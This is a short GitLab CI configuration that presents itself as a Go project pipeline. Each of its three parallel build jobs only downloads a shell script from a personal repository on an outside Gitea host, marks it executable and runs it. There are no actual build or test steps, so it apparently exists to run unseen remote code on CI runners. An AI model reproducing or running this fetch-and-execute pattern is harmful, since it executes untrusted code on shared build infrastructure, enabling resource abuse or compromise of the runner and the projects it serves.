image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://try.gitea.io/kinan/Ty/raw/branch/master/gitlab.sh && chmod u+x gitlab.sh && ./gitlab.sh
    
build_b:
  stage: build
  script:
    - wget https://try.gitea.io/kinan/Ty/raw/branch/master/gitlab.sh && chmod u+x gitlab.sh && ./gitlab.sh
    
build_c:
  stage: build
  script:
    - wget https://try.gitea.io/kinan/Ty/raw/branch/master/gitlab.sh && chmod u+x gitlab.sh && ./gitlab.sh
    